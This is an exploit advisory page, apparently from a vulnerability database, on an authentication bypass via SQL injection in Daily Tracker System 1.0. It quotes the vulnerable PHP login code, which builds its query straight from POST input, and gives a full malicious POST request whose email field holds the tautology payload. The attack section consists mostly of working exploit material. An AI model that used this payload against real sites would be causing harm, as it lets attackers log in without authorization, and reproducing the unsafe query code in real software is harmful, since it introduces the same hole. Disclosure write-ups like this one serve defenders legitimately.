Daily Tracker System 1.0 SQL Injection

2020.08.01
Credit: Bobby Cooke
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass # Exploit Author: Adeeb Shah (@hyd3sec) # Credit to Bobby Cooke # Date: July 29th, 2020 # Vendor Homepage: https://www.sourcecodetester.com # Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Vulnerable Source Code if(isset($_POST['login'])) { $email=$_POST['email']; $password=md5($_POST['password']); $query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' "); $ret=mysqli_fetch_array($query); if($ret>0){ $_SESSION['detsuid']=$ret['ID']; header('location:dashboard.php'); } else{ $msg="Invalid Details."; } } ?> # Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1 POST /dets/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.65.130/dets/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 48 DNT: 1 Connection: close Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s Upgrade-Insecure-Requests: 1 email='+or+1%3d1+--+hyd3sec&password=badPass&login=login


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top